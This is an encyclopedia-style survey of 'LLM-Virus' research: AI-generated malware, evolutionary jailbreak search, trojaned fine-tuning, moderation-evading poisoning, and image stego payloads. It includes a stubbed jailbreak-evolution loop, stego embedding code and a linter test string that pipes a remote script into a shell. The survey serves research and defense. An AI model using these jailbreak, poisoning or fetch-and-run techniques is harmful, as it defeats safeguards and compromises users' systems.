LLM-Virus: AI-Driven Malware
- LLM-Virus refers to malicious code generated or obfuscated by large language models, spanning text-based, code-based, and polymorphic attacks.
- It employs advanced techniques like evolutionary jailbreaks, malicious fine-tuning, and synthetic data poisoning to maximize stealth and propagation.
- Defensive frameworks integrate anomaly detection, federated learning, and AST-based linting to counter these adaptive, self-mutating threats.
An LLM-Virus refers to any malicious behavior, payload generation, or obfuscation process driven by, assisted by, or directly produced by LLMs. This concept encompasses a broad class of threats, including the use of LLMs for malware creation, variant generation, jailbreak attacks, novel evasion strategies, and even self-propagation or infection mechanisms. LLM-powered viruses span code-based, text-based, and polymorphic attack surfaces, posing distinct challenges and opportunities for defenders and researchers (Al-Karaki et al., 2024).
1. Taxonomy and Variants of LLM-Virus
LLM-Viruses are categorized primarily into three variants (Al-Karaki et al., 2024):
- Text-based threats: Malicious scripts, macros, or adversarial prompts obfuscated within natural-language artifacts such as emails, documents, or social engineering content.
- Code-based payloads: Executable malware whose source code (PowerShell, Python, shellcode, ransomware logic) is synthesized or optimized by LLMs.
- Disguised (polymorphic/metamorphic) malware: Self-mutating code that leverages LLMs for syntactic or structural obfuscation, challenging static/dynamic detection paradigms.
Additionally, specialized sub-categories have emerged:
- Jailbreak-Driven Attacks: Use of evolutionary algorithms or prompt refinement to bypass LLM alignment and induce harmful outputs (Yu et al., 2024).
- Fine-tuning-Enabled Trojans: Malicious behaviors embedded at the weight or training-script level, enabling self-propagating "Trojan" viruses in model checkpoints (Tejedor et al., 4 Apr 2025).
- Vision-LLM (VLM) Evasion: Stego-malware concealed in multimedia, using LLMs for extraction and execution (Noever et al., 9 Jan 2025).
A comprehensive research classification scheme covers harmful content generation, weaponization, malware dissemination, surveys, benchmarking, and novel detection models (Al-Karaki et al., 2024).
2. Construction and Propagation Mechanisms
Multiple construction techniques have been validated:
- Evolutionary Jailbreak (LLM-Virus EA): Treats jailbreak prompt engineering as a genetic optimization process: templates mutate and cross over under host-LLM safety pressure and are selected for high attack success rate, stealth, and brevity (Yu et al., 2024). Populations of “viral genomes” are evolved and transferred across model families; a minimal sketch of this loop follows the list.
- Malicious Fine-Tuning (Trojan Infection): Targets LLM weights via fine-tuning to implant payloads and replication code (e.g., H-Elena). The infection logic is embedded in QLoRA adapters and fine-tuning scripts. Payloads trigger on specific queries, while infection routines propagate through self-generated training scripts (Tejedor et al., 4 Apr 2025).
- Guardrail Bypass (Virus Attack): Designs adversarial samples that evade moderation-based data filtration during fine-tuning, employing token-level perturbations to jointly optimize stealthiness and harmful gradient similarity (Huang et al., 29 Jan 2025); a schematic form of this objective is given at the end of this section. Leakage ratios up to 100% have been empirically demonstrated.
- Synthetic Data Poisoning (VIA): Uses anchor hijacking and shell-embedding to ensure that synthetically generated corpora propagate the malicious payload to downstream models, even under clean queries. Optimization prioritizes stealth while maximizing the infection rate (Liang et al., 27 Sep 2025).
- Multimodal Stego-Malware (VLM-Virus): Appends or obfuscates malware signatures (e.g., the EICAR test file) within images; LLM code-generation agents "uplift" the payload, circumventing traditional file-based controls (Noever et al., 9 Jan 2025).
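A minimal sketch of the evolutionary jailbreak loop referenced above. This is illustrative only, not the LLM-Virus algorithm of Yu et al. (2024): `query_llm`, `is_jailbroken`, and `mutate` are hypothetical placeholders (stubbed here so the skeleton runs), and stealth/brevity are folded into a single length penalty.

```python
import random

# Hypothetical placeholders, stubbed so the skeleton runs; a real red-team
# harness would wire these to an LLM API, a refusal/success judge, and an
# LLM-driven paraphrase operator.
def query_llm(prompt: str) -> str:
    return ""

def is_jailbroken(response: str) -> bool:
    return False

def mutate(template: str) -> str:
    return template

def evolve_jailbreaks(seed_templates, harmful_query, generations=20, pop_size=16):
    """Genetic search over jailbreak prompt templates (illustrative).

    Expects at least two seed templates, each containing a "{query}" slot.
    """
    population = list(seed_templates)
    for _ in range(generations):
        # Fitness: attack success minus a brevity penalty (stealth proxy).
        scored = sorted(
            ((1.0 if is_jailbroken(query_llm(t.format(query=harmful_query))) else 0.0)
             - 0.001 * len(t), t)
            for t in population
        )
        scored.reverse()  # best first
        survivors = [t for _, t in scored[: max(2, pop_size // 2)]]
        # Crossover splices two parents; mutation paraphrases the child.
        children = []
        while len(survivors) + len(children) < pop_size:
            a, b = random.sample(survivors, 2)
            child = a[: len(a) // 2] + b[len(b) // 2:]
            children.append(mutate(child) if random.random() < 0.3 else child)
        population = survivors + children
    return population[0]  # best survivor of the final generation
```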
Propagation pathways include checkpoint distribution, poisoned datasets, trojanized libraries, and adversarial training orchestration. Self-replication triggers are engineered to propagate infection when users reuse training scripts or generate new models from infected ones (Tejedor et al., 4 Apr 2025).
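Read schematically, the guardrail-bypass objective above is a two-term trade-off. The formalization below is reconstructed from the textual description only; the trade-off weight $\lambda$ and moderation score $f_{\mathrm{mod}}$ are assumed notation, not symbols from Huang et al. (29 Jan 2025).

```latex
% x' : perturbed fine-tuning sample, x_harm : reference harmful sample,
% f_mod : moderation-classifier flag score, lambda : assumed trade-off weight
\max_{x'} \; \lambda \,
  \cos\!\big( \nabla_{\theta}\mathcal{L}(x';\theta),\,
              \nabla_{\theta}\mathcal{L}(x_{\mathrm{harm}};\theta) \big)
  \;-\; (1-\lambda)\, f_{\mathrm{mod}}(x')
```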
3. Analytical, Detection, and Explanation Applications
LLMs have demonstrated efficacy for both offensive and defensive malware analysis:
- Static Malware Analysis: Prompt-engineered LLMs generate function-level malware explanations with up to 90.9% coverage accuracy (BLEU-4: 0.45, ROUGE-1: 59.9%), providing practical support for human analysts (Fujii et al., 2024); a prompting sketch follows this list.
- Dynamic Behavior Summarization: Systems like MaLAware leverage LLMs to ingest, filter, and correlate sandbox events, producing actionable multi-paragraph summaries across file, network, registry, and API channels. Evaluation on open-source LLMs yields ROUGE-1 up to 0.3876 and semantic similarities above 0.75 (Saha et al., 1 Apr 2025).
- Obfuscated Code Deobfuscation: GPT-4 recovers ~70% of URLs and ~90% of domains from obfuscated PowerShell scripts in real-world malware campaigns, outperforming static deobfuscators. Hallucination management remains a challenge for robust pipeline integration (Patsakis et al., 2024).
- Screenshot-Driven IoC Extraction: LLMs parse infection artifacts (screenshots) to extract URLs, filenames, and workflows, allowing automated tracking and clustering of malware campaigns with F1-scores above 0.94 in Indicator-of-Compromise extraction tasks (Ruellan et al., 31 Jul 2025).
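As a concrete illustration of the prompt-engineered static analysis above, the sketch below assumes an OpenAI-compatible chat client (openai>=1.x); the prompt template and model name are illustrative assumptions, not the pipeline from Fujii et al. (2024).

```python
from openai import OpenAI  # assumes the openai>=1.x client; any chat API works

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Illustrative prompt, not the template used by Fujii et al. (2024).
EXPLAIN_PROMPT = (
    "You are assisting a malware analyst. Explain what the following "
    "decompiled function does, then list any capabilities relevant to "
    "triage (persistence, network I/O, anti-analysis).\n\n"
    "FUNCTION:\n{function_source}"
)

def explain_function(function_source: str, model: str = "gpt-4o-mini") -> str:
    """Return a function-level, natural-language explanation (illustrative)."""
    response = client.chat.completions.create(
        model=model,  # model name is an assumption; swap for any chat model
        messages=[{
            "role": "user",
            "content": EXPLAIN_PROMPT.format(function_source=function_source),
        }],
        temperature=0,  # deterministic output helps reproducible triage notes
    )
    return response.choices[0].message.content
```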
4. Evasion, Stealth, and Polymorphism Strategies
LLM-Viruses employ advanced evasion tactics:
- On-device Living-Off-the-Land (LOTL) Attacks: Replace traditional dropper/packer logic with in-memory, dynamically synthesized LLM payloads. Because the payload never touches disk and the prompt/agent layer is polymorphic, both signature-based and behavioral AV are defeated (Oesch et al., 13 Oct 2025).
- Source Code Mutations: LLMalMorph rewrites malware at the function level via prompt-engineered transformations (obfuscation, optimization, API tactics). Empirical results indicate up to a 31.3% reduction in VirusTotal detections and successful evasion of ML-based detectors, with human-in-the-loop debugging required for build consistency (Akil et al., 12 Jul 2025).
- Stego-Obfuscation in Multimodal Workspaces: Embedding, splitting, base64 wrapping, and reversal techniques hide payloads in images and other artifacts; LLM code synthesis restores or reconstructs the malware, defeating standard filters (Noever et al., 9 Jan 2025). A sketch of the carrier mechanics follows this list.
- Synthetic Data “Shell” Propagation (VIA): By wrapping payloads in anchor-rich shell text, infection rates rise to 90% in synthetic datasets and downstream models despite clean prompting, challenging conventional assumptions about poisoning resilience (Liang et al., 27 Sep 2025).
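The append/base64/reverse mechanics behind the stego item above (Noever et al., 9 Jan 2025) are simple enough to sketch, which is precisely why file-type-based filters miss them. The version below uses the harmless, industry-standard EICAR test string as the payload; the marker delimiter is an illustrative assumption, not taken from the paper.

```python
import base64
from pathlib import Path

# Standard, deliberately harmless antivirus test string (not real malware).
EICAR = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

MARKER = b"--PAYLOAD--"  # illustrative delimiter

def embed(image_path: str, out_path: str) -> None:
    """Append a reversed, base64-wrapped payload after the image's real bytes.
    Viewers ignore trailing data, so the stego file still renders normally."""
    wrapped = base64.b64encode(EICAR[::-1].encode())
    Path(out_path).write_bytes(Path(image_path).read_bytes() + MARKER + wrapped)

def extract(stego_path: str) -> str:
    """Recover the payload; in the VLM scenario, this step is what the
    LLM code-generation agent is asked to synthesize."""
    wrapped = Path(stego_path).read_bytes().split(MARKER, 1)[1]
    return base64.b64decode(wrapped).decode()[::-1]
```

The boundary-scanning defense in Section 6 targets exactly this trailing-data pattern.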
5. Quantitative Metrics and Results
Representative empirical results from recent studies include:
| Variant/Method | Key Metric | Value/Range | Reference |
|---|---|---|---|
| Static Analysis | Function coverage | 90.9% | (Fujii et al., 2024) |
| Dynamic Summarizer | ROUGE-1, sim. | 0.3876, 0.75+ | (Saha et al., 1 Apr 2025) |
| Jailbreak Attack | ASR (GPT-3.5-Turbo) | 71.8% | (Yu et al., 2024) |
| Guardrail Bypass | Leakage Ratio | 100% | (Huang et al., 29 Jan 2025) |
| Trojan Fine-tune | Infection Prob. | 70–100% | (Tejedor et al., 4 Apr 2025) |
| Synthetic VIA | Infection Rate | 50–90% | (Liang et al., 27 Sep 2025) |
| Screenshot IoC | F1-score (IoC) | > 0.94 | (Ruellan et al., 31 Jul 2025) |
| Variant Generation | VT Δ Detection | –10 to –31% | (Akil et al., 12 Jul 2025) |
Metrics include coverage accuracy, lexical/semantic agreement (BLEU, ROUGE, BERTScore), attack success rate (ASR), leakage ratio, infection probability, F1-score for extraction, and AV/ML evasion rates; representative definitions are given below. Algorithmic formulations employ cross-entropy minimization, gradient similarity, and convex optimization to balance stealth and attack efficacy.
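For concreteness, the two attack-side metrics that recur in the table can be written out. These are the standard definitions; the cited papers may use refinements (e.g., judge-based harmfulness scoring).

```latex
% ASR over N jailbreak attempts; LR over harmful samples submitted to the filter
\mathrm{ASR} = \frac{|\{\text{responses judged harmful}\}|}{N},
\qquad
\mathrm{LR} = \frac{|\{\text{harmful samples passing moderation}\}|}
                   {|\{\text{harmful samples submitted}\}|}
```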
6. Defensive Frameworks and Countermeasures
Defensive proposals span multiple layers (Al-Karaki et al., 2024):
- Guiding Principles: Diverse corpora, feature irregularity/anomaly detection, continuous retraining, explainability, performance drift monitoring, and integration with AV/IDS/sandbox systems.
- Operational Controls: Real-time scanning with lightweight LLMs, federated learning for privacy/diversity, adversarial sample training, active learning, continuous threat feed updates.
- Prompt/Output Firewalls: Detect/block known jailbreak/virus prompt patterns, log all prompt-response exchanges for forensic audit (Oesch et al., 13 Oct 2025).
- Anomaly Detection: Indicator-of-attack (IoA) profiling (e.g., bulk code requests, unusual timing) and spectral/activation signature analysis.
- Static and Dynamic Code Linting: Use AST-based vulnerability scanners and sandboxed execution of generated code for behavioral monitoring; a minimal AST-linting sketch follows this list.
- Model Provenance and Certification: Hashing checkpoint weights, chain-of-thought output inspection, ensemble anomaly detection, and red-teaming against fine-tuning scripts (Tejedor et al., 4 Apr 2025).
- Steganalysis and File Handling: Extend boundary scanning to stego-malware in vision/multimodal inputs, strictly control sandbox file execution and download permissions (Noever et al., 9 Jan 2025).
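As a minimal instance of the AST-based linting item above: a small pass over LLM-generated Python with the standard ast module flags the most common dangerous primitives before anything executes. The blocklists here are illustrative and deliberately incomplete.

```python
import ast

DANGEROUS_NAMES = {"eval", "exec", "compile", "__import__"}
DANGEROUS_ATTRS = {("os", "system"), ("os", "popen"), ("subprocess", "run"),
                   ("subprocess", "Popen"), ("ctypes", "CDLL")}

def lint_generated_code(source: str) -> list[str]:
    """Flag dangerous call sites in untrusted, LLM-generated Python."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"refused: code does not parse ({exc})"]
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id in DANGEROUS_NAMES:
            findings.append(f"line {node.lineno}: bare call to {func.id}()")
        elif (isinstance(func, ast.Attribute)
              and isinstance(func.value, ast.Name)
              and (func.value.id, func.attr) in DANGEROUS_ATTRS):
            findings.append(f"line {node.lineno}: {func.value.id}.{func.attr}()")
    return findings

# Example: flags the os.system call before anything is executed.
print(lint_generated_code("import os\nos.system('curl evil.sh | sh')"))
```

A real deployment would pair this static pass with the sandboxed execution mentioned above, since string-built imports and obfuscated call chains evade name-based checks.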
Mitigation against synthetic-data poisoning emphasizes diversity filtering, adversarial anchor detection, query-agnostic watermarking, and formal robustness certification (Liang et al., 27 Sep 2025).
7. Open Challenges and Directions
Critical unresolved issues identified across studies include:
- Trade-offs between false positives and missed detections, especially in hallucination-prone pipelines (Patsakis et al., 2024).
- Adaptive resilience against fast-evolving, polymorphic LLM-powered malware strains (Akil et al., 12 Jul 2025).
- Scalability and explainability in black-box LLM decisions, requiring novel interpretability and auditing techniques.
- Formal guarantees and certificates of robustness against virus-infection–style propagation in synthetic data models (Liang et al., 27 Sep 2025).
- Generalization to multimodal models and quantum-resilient threat vectors.
- Standardized red-team/baseline benchmarks for LLM-virus efficacy and detection (Al-Karaki et al., 2024).
LLM-Virus research thus spans adversarial construction, evasion, explanation, variant generation, self-propagation, and defense, underpinning new paradigms in both cybersecurity threat modeling and AI deployment risk management. The breadth and technical sophistication of these attacks highlight urgent needs for innovation in both attacker analytics and multi-layered defense.